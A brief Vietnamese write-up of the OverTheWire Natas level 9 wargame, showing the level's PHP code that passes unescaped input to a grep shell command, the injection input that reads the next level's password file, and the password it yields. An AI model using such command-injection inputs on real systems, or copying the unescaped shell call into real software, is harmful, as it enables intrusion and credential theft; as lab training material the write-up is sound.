http://natas9.natas.labs.overthewire.org/
Find words containing…
Nhấn View sourcecode:
|
1 2 3 4 5 6 7 8 9 10 11 |
<? $key = ""; if(array_key_exists("needle", $_REQUEST)) { $key = $_REQUEST["needle"]; } if($key != "") { passthru("grep -i $key dictionary.txt"); } ?> |
Cú pháp lệnh grep có thể tham khảo tại:
Thông tin được cung cấp từ đầu:
Each level has access to the password of the next level. Your job is to somehow obtain that next password and level up. All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5.
Do biến $key không bị escape, ta có thể inject bằng input sau:
'' /etc/natas_webpass/natas10;
Kết quả:
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
→ flag = nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu.